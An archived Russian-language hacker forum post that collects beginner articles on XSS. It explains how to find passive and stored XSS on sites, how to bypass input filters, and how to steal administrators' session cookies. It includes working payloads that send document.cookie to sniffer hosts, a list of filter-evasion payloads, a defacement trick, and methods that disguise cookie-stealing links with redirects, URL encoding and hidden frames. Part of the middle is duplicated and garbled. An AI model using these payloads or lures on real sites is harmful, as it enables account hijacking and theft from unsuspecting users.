Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Пассивные и Активные XSS - теория и практика

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Пассивные и Активные XSS - теория и практика
Имя
Сообщение << Старые топики   Новые топики >>
Пассивные и Активные XSS - теория и практика - 2008-11-27 04:39:10.180000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
Статья не моя, просто на мой взгляд написано очень доступно, в ней собрано всё основное то, чтобы понять:

1. Что такое XSS вообще
2. Для чего нужен XSS
3. Пассивные и Активные XSS - определение и примеры поиска

Если вы в курсе - не читайте, только для новичков, хотя есть интересные моменты и для "опытных" пользователей.

Итак, XSS - это http://ru.wikipedia.org/wiki/Межсайтовый_скриптинг

=====Статья #1 XSS - взглядом хакера.Как хакеры используют XSS========
Cookies -что такое?
Служат для сохранения учётных данных сайта на компьютере юзера.
Если вы зарегестрировались на сайте под именем "Вася Попов"
то сайт сохранил у вас на компьютере файл с cookies где закодированы
ваши данные.
А теперь представим, что вы Вася Попов администратор сайта.
У вас есть доступ к изменению информации на сайте и прочей байде.
Я "Антон Котов" перехватываю cookies Васи Попова.
И и захожу на сайт…сайт меня определяет как Васю Попова и у меня
администраторские права.
Таким вот не хитрым способом можем перехватывать права.

Чтобы перехватить cookies надо найти место на сайте, где можно выполнить
XSS-атаку.
(прим. - т.е. это и есть сама суть XSS)

Перехват кукисов.
Скачайте программу A4 Proxy
установите её.
в меню options установите галочку direct connection
во вкладке proxy options установите browser port 8080
check port 80
Далее зайдите в Internet Explorer-сервис-свойства обозревателя-подключения
(выберите подключение и отметье)-настройка-поставьте галочку Использовать прокси-сервер…
выставьте адрес 127.0.0.1 и порт 8080
всё

К примеру вы нашли XSS на каком нибудь сайте, вставляете скрипт
<sсriрt>img = new Image(); img.src = "http://www1.hut.ru/anek.shtml?"+document.cookie;</sсriрt>
переменная document.cookie это и есть cookies.
В данном случае cookies будут отправленны на сниифер http://www1.hut.ru/anek.shtml
вы сможете зайти на http://www1.hut.ru/aneksniff/sniffer.txt и увидеть перехваченные cookies
**
Дадим ссылку админу на скрипт.Подождём пока админ не посмотрит на ссылку и куки не уйдут на
http://www1.hut.ru/aneksniff/sniffer.txt , периодически просматриваем лог…ищем куки админа.
далее остаёться только подменить свои кукис на перехваченные, на сайте-жертве.
Заходим в A4 Proxy во вкладку Browser options в поле Variable пишем Cookie
в поле Replace with… копируем из лога сниффера http://www1.hut.ru/aneksniff/sniffer.txt
содержимое переменной query и нажимаем кнопочку add.(прим. - тоже самое можно сделать в ОПЕРА
- Инструменты - Дополнительно - Управление cookies - название сайта - изменить)
Всё заходим на сайт как админ.

======Статья #2.Авторские заметки о XSS==========

Исходя из того, что в интернете к сожалению по прежнему безопастность
дело не первоочередное мы практически в каждома сайте можем найти уязвимость.
Мы находим уязвимость и соощаем её администратору сайта,
что здесь у вас такая-то дыра, и что неплохо было бы если в новостях
сайта мелькнёт имя Next Level Security Team.

Итак перейду конкретно к тому как найти в данном сайте XSS.
Напишу об этом основываясь на своём опыте.
Перед нами www.site.ru что нам надо искать?
1) КОнечно же ищем куда загрузить картинку-XSS,
если есть фильтр смотрим используеться ли расширенние *.png.
Если используеться пробуем загрузить псевдо-картинку-XSS.

2) открываем каждый модуль (файл) сайта.
и смотрим всевозможные поля для метода Post.
(отправки на сервер)

3)ищем скрытые поля типа hidden и всякие различные элементы
значение которых передаваёться на сервер
на сервер (всякие галочки, низспадающие менюшки и т.д.)
Преобразовать все эти лементы в поля поможет программка IE_XSS_Kit.rar
или какой нить её аналог.

4)
выписываем название файла в блокнотик,
далее в html коде ищем строки "action" и "name" и выписываем значение.
Т.е. куда отправляеться и что отправляеться.
И так в каждом модуле просматриваем возможные переменные.
Дальше пробуем для кого нить малопосещаемого (по нашему мнению) модуля
различные переменные.

Выше я написал мои методы проверки на уязвимость,
а теперь конкретно, что делать с переменными, какое значение
писать и как обходить фильтр

А)
Ужасна распастраннёная узявимость типа ">
т.е. в каждой переменной пишем
"><sсriрt>alert()</sсriрt>
и проверяем после отправки, открываем html и ищем слово
alert т.е. ищем ответ сайта и что с запросом сделал фильтр.
Если вы обнаруживаете, что-то типа alert() или
">alert()
или
<sсriрt />alert()</sсriрt>
т.е. фильтр разришает отправлять и выполнять кавычки, он только
преобразует запрос => то тогда вы нашли XSS.
Остаёться только правильно составить запрос, чтобы он
выполнился.

Б)
Используем фильтр для запроса.
Это применяеться тогда когда к вашему запросу добавляет
фильтр какую нить инфу которая портит запрос.
к примеру вы отправили
<sсriрt>alert()</sсriрt>
а не чего не выполнилось. Вы лезете в html и видите
<sсriрt>alert()</sсriрt>>
свой целый запрос +
фильтр добавил ">
Ту легко, естественно нам следует послать
<sсriрt>alert()</sсriрt
Фильтр дополнит наш запрос и он выполниться.
(пример такой XSS недавно найденная на форуме в хакер.ру)
Бывает такое загружаете запрос а фильтр дополняется тэги
</sсriрt> какую нить фигню.Т.е. вы загружаете
<sсriрt>alert()</sсriрt>
открываете html ищите alert и видите такую картину:
<sсriрt></sсriрt></textarea>alert()</sсriрt>
В некоторых случаях этот фильтр тоже не трудно обойти,
пишем
<sсriрt></sсriрt></textarea><sсriрt>alert()</sсriрt>
(аналогич. XSS можно узреть в форумах на Ruhelp.com)

В) Используя скрытые переменные и переменные объектов всяких менюшек и т.п.
пытаемся выполнить запрос.
т.е. сначало программой IE_XSS_Kit.rar
Открываем все такие объекты как простые поля и пытаемся в писать в них составить
запрос.

г) основная ошибка разработчиков движков.
Состоит в объявлении строковой переменной вместо числовой.
т.е. к примеру такой путь www.site.ru/?page_id=2
Конечно мы подуммаем что переменная page_id - числовая.
Но я сколько раз натыкался на такие нелепые ошибки, что переменную
назначали строковой и она держала символы.
Отправим www.site/index.php?action&page_id=2k
Если не будет ошибки а будет надпись "страница не найденна"
99% что переменная строковая и мы можем попробовать вставить запрос.
тщательно просматривайте все такого рода переменные.

д)Поиск активных XSS.
Очень трудная и кропотливая работа.
Просто так вы уже в XSS на запись любой запрос не выполните.
Тут надо использовать другие разрешённые тэги и прекрываясь ими надо
выполнить запрос.
тэги URL,BB,IMG могут помочь нам в этом.
Весь смысл вставки заключаеться в том, что нам
надо встроить запрос в парметр img или url
У Img есть много парметров кроме src и alt.

======Статья #3.Авторские заметки о XSS - продолжение==========

Рассмотрим что такое XSS это выполнение произволного скрипта на сайте.
Скрипт будьто яваскрипт или вбскрипт или html-тэг это
сценраий который используеться для формирования и отображения
информации в браузере.
т.е. XSS атаки это атаки не на сам сайт а на пользователей сайта.
т.к. скрипты для сервера - пустое место.

Пассивная XSS - это когда вам удалось просто выполнить скрипт на сайте
не сохраняя его.

Активная XSS - это когда вам удалось сохранить где нибудь в страничке скрипт
и при каждом обновлении странички скрипт выполняеться.
К примеру вставка скрипта в дневники, в доски объявлений в форум, в гостевые книги
и т.д.

Рассмотри применение пассивных XSS, открываем любой сайт и пытаемся
найти пассивную XSS т.е. нефильтруемое или плохофильтруемое место
где можно вставить свой скрипт.

Обычно для распознания выполнения скрипта используют скрипт вывода сообщения
<sсriрt>alert()</sсriрt>
т.е. если вышло сообщение (табличка) то вы нашли XSS.

Открываем любой ресурс и в полях для ввода текста пытаемся вставить
<sсriрt>alert()</sсriрt>
Пытаемся вставить во се различные поля этот скрипт…если вышло сообщение значит скрипт обработался
и выполнился.
Самая распостранёная XSS (наблюдаеться во всех местах где плохая фильтрация):
"><sсriрt>alert()</sсriрt>
Вся суть в ">
Давайте подуммаем что мы делаем когда вводим в поле "><sсriрt>alert()</sсriрt>,
что происходит?
мы вводим в форму "><sсriрt>alert()</sсriрt>
какая-то перменной присваиваеться значение поля
перменная обрабатываеться и "> выполняеться и закрывает скрипт и
выпролняя <sсriрt>alert()</sсriрt>
………
Эта XSS самая распостранёная.
т.е. просматриваем все поля сайта и пытаемся вставить "><sсriрt>alert()</sсriрt>
если вышло сообщение вы нашли XSS…далее вы можете составить запрос
передачи куков на сниффер и дать эту ссылку человеку зарегестрированном на этом сайте,
к примеру админу…он заходит на неё и его кукисы уходят на сниффер.
Нам остаёться подменить свои кукисыф на адлминские и мы админы сайта=)

ещё если фильтруеться sсriрt XSS:
<sсriрt 1>alert()</sсriрt 1>

вот такой вот вред кроеться в пассивной XSS - воровство кукисов.

Надеюсь всё поняли до этого момента.

ПОиск всех XSS

А как определить крутой фильтр стоит или нет?*
да очень просто в любое поле вводим: сука<>,"\
Дальше открываем html страничку и ищем слово "сука"
и смотри последующие сиволы..
=
Если <> так и остались
то это раз, это значит что фильтр имеет дырку.
если ,"'\ символы остались такие как введёные - это два, как
возможные дополнительные символы к последующей XSS атаке.
=
Если открыв HTML вы не обнаружили <> то скорее всего дырка
в фильтре.
=
Если открыв HTML вы обнаружили что <> заменены на другие символы
то это обломс - фильтр покрайней мере функционирет нормально.


Возможно ещё ввести в поле для проверки фильтрации вот так:
"><>'",
т.е. с нашей "> =)))
….
Многие длуммают что нахождение XSS в ресрусах это тупой подбор уже
готовых скриптиков, — заявляю открыто это ерунда,
конечно вам может повести и вы не попадёте на более менее серьёзную
фильтрацию и ваша XSS выполниться но это большая редкость…

Итак как мы поняли щупаем фильтр методом проб и проверок:
1) вводим в поле символы
2) смотри в html профильтрованый ответ что у нас получаеться

к примеру мы ввели в форум:
в различные поля е-майл сайт текст сообщения "><>
вышла ошибка неправильный е-майл, неправильный сайт
тогда в емайл вводим: suka@yandex.ru"><>
в сайт вводим соотвественно: http://www.com.net"><>
ну и в сообщение <>
Дело в том что на разные поля разная фильтрация, конечно серьёзные
разработчики ставят одинаково крутую фильтрацию на все поля, но таких оч. мало
Итак лезим в html ищем нашу мессагу и смотрим профильтрацию.
к примеру <> остались как есть тогда добавляем ещё сообщение в форуме
"><sсriрt>alert()</sсriрt>
смотрим что получилось…возможно фильтр ищет такие слова как sсriрt, javascrip,vbsсriрt
и фильтрует их…тогда существует возможность ввести так: "><sсriрt 1>alert()</sсriрt 1>

Рассмотрим случай если фильтр съедает <>
в этом случае существует вероятность дырки.
к примеру фильтра условия съедать <sсriрt>,<> и т.д.
тогда пробуем <qweqweqwfdfsdv213> и смотри если не съелось
нашли дырку…дпльше можно составить скрипт XSS
Ещё существует метод вложенного скрипта, к примеру вот так:
<sc<sсriрt>ript>alert()</sc</sсriрt>ript>
это если фильтр не оч. сильный и плохо фильтрует.
Ещё можно попробовать во так:
>>>><<sсriрt
бывает что фильтр подсчитывает откр и загр. скобки и закрывает сам.
т.е. сначало фильтрует а потом закрывает…что даёт нам дырку к инъекции скрипта.
частенько бывает что фильтр дополняет скрипт, к примеру вот этим "> (т.е. закрывает скрипт)
К примеру XSS на xakep.ru
http://forum.xakep.ru/error.asp?sessionID="><IMG%20SRC="javasсriрt:alert();
фильтр смотрит что нечего опсасного в <IMG%20SRC="javasсriрt:alert();
нет и закрывает тем самым выполняя скрипт.
…..
Ещё конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и
вставить код.
…….
Короче ребята всё надо пытаться методом проб и ошибок искать.
Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра.
методом тыков понять как фильтр работает, есть ли у него недоработки.
если фильтр плохой мы всегда можем вставить скрипты.
…..
Теперь рассмотрим активные XSS с помощью разрешённых тэгов.
К примеру просмтреть ресурс, к примеру форум на наличие использования
тэгов , к примеру вставляем ф форум:

выходит крестик…значит img используеться и мы его подобрали
(просто дело в том, что бывает img включён а админы из создания
сообщения его убирают, мол картинки вставлять нельзя
и бывает он в использовании разной формы)
если крестика нет…а весит всего надпись

то попробуйте ещё так:

проверим держит ли фильтр пробел, добавляем пробел
после расширения jpg

если крестик есть тогда ура.
(далее существуют у img параметры dynsrc и lowsrc которые
держат яваскрипт)
пытаемся к примеру вставить:

проверяем отсылаем, кокроче как появиться сообщение значит нашли активную XSS
и вместо alert() можете вставить любой скрипт.
Если фильтр не сдался попробуйте так:

и


короче всё надо тестить…абсолютно всё
И XSS кстати сейчас пассивные наблюдаються в 90% ресурсов.
а активные в 60%
так что у вас всегда 1\2 что найдёте активную XSS главное протестите фильтр и попытайтесь выполнить скрипт.

вот выпишу XSS которые я частенько юзаю:
(естественно их надо преобразовывать под конкретную цель)

[font color=[img src=http://antichat.ru/cgi-bin/s.jpg/style=display:none;background:
url(javasсriрt:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]]
[font color=red[img src=http://wj.gifwj/style=background:;url(javasсriрt:
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]]
&lt;IMG SRC="javasсriрt:alert('XSS');"&gt;
&lt;IMG SRC=javasсriрt:alert('XSS')&gt;
&lt;IMG SRC=JaVasсriрt:alert('XSS')&gt;
&lt;IMG SRC="livesсriрt:"&gt; &lt;IMG SRC="mocha:[code]"&gt; &lt;IMG SRC='vbsсriрt:msgbox("XSS")'&gt; &lt;imgjavasсriрt:alert()&gt; &lt;IMG LOWSRC="javasсriрt:alert('XSS')"&gt; &lt;IMG DYNSRC="javasсriрt:alert('XSS')"&gt; &lt;IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt; &lt;IMG SRC="  javasсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC=`javasсriрt:alert("RSnake says, 'XSS'")`&gt; &lt;IMG SRC=javasсriрt:alert("XSS")&gt; &lt;XSS STYLE="xss:еxprеssion(alert('XSS'))"&gt; &lt;XSS STYLE="behavior: url(xss.htc);"&gt; &lt;A HREF="javasсriрt:document.location='http://www.google.com/'"&gt;XSS&lt;/A&gt; &lt;A HREF="http://www.gohttp://www.google.com/ogle.com/"&gt;XSS&lt;/A&gt; a="get";b="URL(\"";c="javasсriрt:";d="alert('XSS');\")";eval(a+b+c+d); &lt;sсriрt SRC=http://ha.ckers.org/xss.js?&lt;B&gt; &lt;BR SIZE="&{alert('XSS')}"&gt; Кстати если кавычки фильтруються...есть оч. хорошая кодировка ASCII charcode &lt;IMG SRC=javasсriрt:alert(String.fromCharCode(88,83,83))&gt; ещё напишу что существует реальный псевдо-дефейс страницы в которую сохраняете активную XSS это достигаеться инъекцией на чтение нового объекта Делаем дефейс, кодируем его в HTML (without semicolons) кодировку и заменяем &# запятыми. вставляем в XSS document.write(String.fromCharCode(КОД)) где вместо код ваш закодированный дефейс. сохраняем сообщение и вместо текущей страницы появиться ваш дефейс. т.е. получаеться активная XSS может предпологать реальную атаку с псевдо-заменой (содержания) страничек. пример: &lt;IMG SRC=javasсriрt:document.write(String.fromCharCode(60,104,116,109,108,62,1087,1088,1080,1084,1077,1088, 32,1088,1077,1072,1083,1100,1085,1086,1081,32,1072,1090,1072,1082,1080,32,1072,1082,1090,1080,1074,1085,1086, 1081,32,88,83,83,60,47,104,116,109,108,62))&gt; ======Статья 5.Примеры поиска активных XSS========== Тут постараюсь поведать о самих примерах XSS. Просто видео сделать и нормально отправить интернет не позволяет, т.е. скорость передачи данных-((( ... ВОт -с тут я напишу вначале вообщем о XSS, потом буду писать примеры: 1) это мы вводим, 2) - ответ фильтра 3) комменты XSS: 1) html-кодировку используем для обхода фильтра, только если уже имеем вставгу тэга. к примеру так вот нельзя: [полностью закодирован скрипт] [&lt;sсriрt[закодирован закр. тэг] [код инъекции] [&lt;sсriрt[закодирован закр. тэг] [код инъекции] [код закрыв. sсriрt] Правильно кодировать только середину между тэгами, сами тэги должны &lt;...&gt; быть полностью нормальные-обычные. К примеру правильно будет так: &lt;sсriрt&gt;[код]&lt;/sсriрt&gt; &lt;img [код]&gt; и т.д. [код] не обяз. всё закодировано, надо пробовать различные комбинации. 2) Надо помнить что коды у символов с разны регистром (т.е. маленькая буковка - большая) разные а восприятие одинаковое. Поэтому надо пробовать комбинировать маленькие символы с большими и т.д. Ну сразу пытаюсь протестить фильтр на символы &lt;,&gt;,",:,(,),/ отправляю эти сиволы с каким нить словом чтобы искать ответ легче было. AIRSG&gt;,&lt;,",:,(,),/ AIRSG,&gt;,&lt;,:,(,),/ т.е. ковычки фильтруються (съедаються) &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; sсriрtalert()/sсriрt Скорее всего фильтрация идёт по извесным словам sсriрt, img и т.д. отправим левое слово и посмотрим ответ: &lt;qweqweq&gt; &lt;qweqweq&gt; О так и думмал, теперь попоробуем: &lt;sсriрt 1&gt;alert()&lt;/sсriрt 1&gt; sсriрt%201alert()/sсriрt%201 Ну тогда пощупаем регистр: &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; sсriрtalert()/sсriрt нуль эммоций, тогда, пробуем комбинировать или тестить др. букву на регистр: &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; вышел алерт УРа!!! Второй пример (2) ",&gt;'&lt; ",&lt;,",&gt; [img]http://qwe/1.jpg[/img] [img src=http://qwe/1.jpg" alt="" />
http://qwe/1.jpg

Картинка
[img src=http://qwe/1.jpg"> и попытаться вставить в них скрипт или комбинировать их.
к примеру вставляем ф форум:

выходит крестик…значит img используеться и мы его подобрали
(просто дело в том, что бывает img включён а админы из создания
сообщения его убирают, мол картинки вставлять нельзя
и бывает он в использовании разной формы)
если крестика нет…а весит всего надпись

то попробуйте ещё так:

проверим держит ли фильтр пробел, добавляем пробел
после расширения jpg

если крестик есть тогда ура.
(далее существуют у img параметры dynsrc и lowsrc которые
держат яваскрипт)
пытаемся к примеру вставить:

проверяем отсылаем, кокроче как появиться сообщение значит нашли активную XSS
и вместо alert() можете вставить любой скрипт.
Если фильтр не сдался попробуйте так:

и


короче всё надо тестить…абсолютно всё
И XSS кстати сейчас пассивные наблюдаються в 90% ресурсов.
а активные в 60%
так что у вас всегда 1\2 что найдёте активную XSS главное протестите фильтр и попытайтесь выполнить скрипт.

вот выпишу XSS которые я частенько юзаю:
(естественно их надо преобразовывать под конкретную цель)

[font color=[img src=http://antichat.ru/cgi-bin/s.jpg/style=display:none;background:
url(javasсriрt:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]]
[font color=red[img src=http://wj.gifwj/style=background:;url(javasсriрt:
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]]
&lt;IMG SRC="javasсriрt:alert('XSS');"&gt;
&lt;IMG SRC=javasсriрt:alert('XSS')&gt;
&lt;IMG SRC=JaVasсriрt:alert('XSS')&gt;
&lt;IMG SRC="livesсriрt:"&gt; &lt;IMG SRC="mocha:[code]"&gt; &lt;IMG SRC='vbsсriрt:msgbox("XSS")'&gt; &lt;imgjavasсriрt:alert()&gt; &lt;IMG LOWSRC="javasсriрt:alert('XSS')"&gt; &lt;IMG DYNSRC="javasсriрt:alert('XSS')"&gt; &lt;IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt; &lt;IMG SRC="  javasсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC="jav asсriрt:alert('XSS');"&gt; &lt;IMG SRC=`javasсriрt:alert("RSnake says, 'XSS'")`&gt; &lt;IMG SRC=javasсriрt:alert("XSS")&gt; &lt;XSS STYLE="xss:еxprеssion(alert('XSS'))"&gt; &lt;XSS STYLE="behavior: url(xss.htc);"&gt; &lt;A HREF="javasсriрt:document.location='http://www.google.com/'"&gt;XSS&lt;/A&gt; &lt;A HREF="http://www.gohttp://www.google.com/ogle.com/"&gt;XSS&lt;/A&gt; a="get";b="URL(\"";c="javasсriрt:";d="alert('XSS');\")";eval(a+b+c+d); &lt;sсriрt SRC=http://ha.ckers.org/xss.js?&lt;B&gt; &lt;BR SIZE="&{alert('XSS')}"&gt; Кстати если кавычки фильтруються...есть оч. хорошая кодировка ASCII charcode &lt;IMG SRC=javasсriрt:alert(String.fromCharCode(88,83,83))&gt; ещё напишу что существует реальный псевдо-дефейс страницы в которую сохраняете активную XSS это достигаеться инъекцией на чтение нового объекта Делаем дефейс, кодируем его в HTML (without semicolons) кодировку и заменяем &# запятыми. вставляем в XSS document.write(String.fromCharCode(КОД)) где вместо код ваш закодированный дефейс. сохраняем сообщение и вместо текущей страницы появиться ваш дефейс. т.е. получаеться активная XSS может предпологать реальную атаку с псевдо-заменой (содержания) страничек. пример: &lt;IMG SRC=javasсriрt:document.write(String.fromCharCode(60,104,116,109,108,62,1087,1088,1080,1084,1077,1088, 32,1088,1077,1072,1083,1100,1085,1086,1081,32,1072,1090,1072,1082,1080,32,1072,1082,1090,1080,1074,1085,1086, 1081,32,88,83,83,60,47,104,116,109,108,62))&gt; ======Статья 5.Примеры поиска активных XSS========== Тут постараюсь поведать о самих примерах XSS. Просто видео сделать и нормально отправить интернет не позволяет, т.е. скорость передачи данных-((( ... ВОт -с тут я напишу вначале вообщем о XSS, потом буду писать примеры: 1) это мы вводим, 2) - ответ фильтра 3) комменты XSS: 1) html-кодировку используем для обхода фильтра, только если уже имеем вставгу тэга. к примеру так вот нельзя: [полностью закодирован скрипт] [&lt;sсriрt[закодирован закр. тэг] [код инъекции] [&lt;sсriрt[закодирован закр. тэг] [код инъекции] [код закрыв. sсriрt] Правильно кодировать только середину между тэгами, сами тэги должны &lt;...&gt; быть полностью нормальные-обычные. К примеру правильно будет так: &lt;sсriрt&gt;[код]&lt;/sсriрt&gt; &lt;img [код]&gt; и т.д. [код] не обяз. всё закодировано, надо пробовать различные комбинации. 2) Надо помнить что коды у символов с разны регистром (т.е. маленькая буковка - большая) разные а восприятие одинаковое. Поэтому надо пробовать комбинировать маленькие символы с большими и т.д. Ну сразу пытаюсь протестить фильтр на символы &lt;,&gt;,",:,(,),/ отправляю эти сиволы с каким нить словом чтобы искать ответ легче было. AIRSG&gt;,&lt;,",:,(,),/ AIRSG,&gt;,&lt;,:,(,),/ т.е. ковычки фильтруються (съедаються) &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; sсriрtalert()/sсriрt Скорее всего фильтрация идёт по извесным словам sсriрt, img и т.д. отправим левое слово и посмотрим ответ: &lt;qweqweq&gt; &lt;qweqweq&gt; О так и думмал, теперь попоробуем: &lt;sсriрt 1&gt;alert()&lt;/sсriрt 1&gt; sсriрt%201alert()/sсriрt%201 Ну тогда пощупаем регистр: &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; sсriрtalert()/sсriрt нуль эммоций, тогда, пробуем комбинировать или тестить др. букву на регистр: &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; &lt;sсriрt&gt;alert()&lt;/sсriрt&gt; вышел алерт УРа!!! Второй пример (2) ",&gt;'&lt; ",&lt;,",&gt; [img]http://qwe/1.jpg[/img] [img src=http://qwe/1.jpg" alt="" />
http://qwe/1.jpg

Картинка
[img src=http://qwe/1.jpg" alt="" />
http://qwe/1.jpg








&lt;img src=http://qwe.ru/"&gt;lowsrc=javasсriрt:alert()/1.jpg()&gt;
Ура XSS выполнилась!!!!

======Статья 6.Примеры Использования пассивных XSS==========

Поговорим о том как использовать пассивные XSS:
допустим вы нашли XSS, давать в чистом виде XSS опасно, так как
только полный ломак не догадаеться что это запрос напередачу куков.
т.е. нам надо как-то скрыть запрос.

============
1) XSS-картинка перенаправление
============

предлагаю следующее:
вставить редиректом запрос на картинку с сайта, чтобы
ты давал не картинку юзеру посмотреть, а левый сайт.

создать к примеру 2-а файла:
main.html

с любым содержанием сайта, к примеру:
&lt;html&gt;
Сайт находиться в стадии разработки…
&lt;/html&gt;

и файл index.html с содержанием:
&lt;html&gt;
&lt;sсriрt language="Javasсriрt"&gt;
document.location.href = "http://site.ru/kartinka.jpg";
&lt;/sсriрt&gt;
&lt;/HTML&gt;
где http://site.ru/kartinka.jpg твой путь к XSS-картинке

создать картинку с содержанием:
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;

document.location.href = "http://pilot-86.narod.ru/main.html";
&lt;/sсriрt&gt;

где http://pilot-86.narod.ru ссылка на твой сайт

теперь тебе остаёться закачать файлы main.html и index.html
на сайт и предлогать юзверям посмотреть твой сайт
(в данном случае http://pilot-86.narod.ru/)

теперь сама суть:
юзверь заходит на сайт, срабатывает скрипт переадресации (в index.html)
переадресация на картинку.
Картинка же отдаёт куки снифферу и переадресовываеться на файл на твоём сайте
main.html

У юзверя в url происходит кидалово по ресурсам…довольно быстрое, мало
кто просечёт тему.

Теперь вы спросите а зачем в картинке писать много раз скрипт передачу куков,
отвечу просто, т.к. нужно время передачи куков на сниффер, т.е.
во время выполнения первого скрипта передачи куков, выполняютсья остальные (как тайм аут)
а потом переадресация.
Если сделать один скрипт передачи куков на сниф в картинке, то не всегда куки будут успевать передаваться.

=============
2) XSS запрос простое кодирование
=============

К примеру вы нашли XSS:

http://site.ru/?search="&gt;&lt;sсriрt&gt;img = new Image(); img.src =
"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;

предлагаю метод переадрессации…метод простой и для ломачков.
создаём файл Index.html с содержанием запроса.
Но тут надо немножко поработать…т.е. надо
закодировать в урл-кодировке сам запрос.
Вы спросите зачем это надо…поясняю, вот как бы выглядел
простой запрос в чистом виде:

&lt;sсriрt language="Javasсriрt"&gt;
document.location.href = "http://site.ru/?search="&gt;&lt;sсriрt&gt;img = new Image();
img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;;"
&lt;/sсriрt&gt;

НУ?*
догадались в чём проблема?*
посмотрите на ковычки.
в данном случае у нас будет переадресация не на полный запрос а на
http://site.ru/?search=
Нам надо закодировать или ковычки или лучше всего, полностью весь запрос
после =

я закодирвал
это
"&gt;&lt;sсriрt&gt;img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;&lt;/sсriрt&gt;
в это
%68%74%74%70%3A%2F%2F%73%69%74%65%2E%72%75%2F%3F%73%65%61%72%63%68%3D%22%3E%3C%73%63%72%69%70%74%3E%69%
6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%
2F%2F%67%6C%79%75%6B%2E%62%79%75%2E%72%75%2F%73%6E%69%66%2F%73%6E%69%66%2E%70%68%70%3F%22%2B%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E

теперь вернёмся к составлению index.html, записываем в него:
&lt;sсriрt language="Javasсriрt"&gt;
document.location.href = "http://site.ru/?search=%68%74%74%70%3A%2F%2F%73%69%74%65%2E%72%75%2F%3F%73%65%
61%72%63%68%3D%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%
6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%67%6C%79%75%6B%2E%62%79%75%2E%72%75%2F%73%6E%69%66%2F%
73%6E%69%66%2E%70%68%70%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E"
&lt;/sсriрt&gt;

всё кидаем Index.html на сайт и даём ссылку сайта юзеверям поглядеть=)

=====================
Метод скрытия переадресации путём скрытого фрэйма.
=====================
Создаём 3-и файла:
Index.html
с содержанием:
&lt;html&gt;
&lt;frameset cols="90%,10%"&gt;
&lt;frame src="1.html" name="window1" frameborder="no" scrolling="no"&gt;
&lt;frame src="2.html" name="window2" frameborder="no" scrolling="no"&gt;
&lt;/frameset&gt;
&lt;/HTML&gt;

файл 1.html
содержанием:
&lt;html&gt;
моя страница
&lt;/html&gt;

и файл 2.html:
с переадресацией на XSS

В своё время я ставил врэймов 5-6 с переадресациями на разные
почтовые сервера…что давало возможность с помощью одного сайта
перехватить почту с разных серверов.

* примечание…метод с фрэймами хоть и самый крутой,
но у него есть момент торможения,в файл с содержанием страницы
необходимо вставить какую нить тяжёленькую картинку, чтобы было время загрузки
и куки успели перехватиться.

( хороший кодировщик-дэкодировщик можно обнаружить тут:
http://ha.ckers.org/xss.html )


===================================================

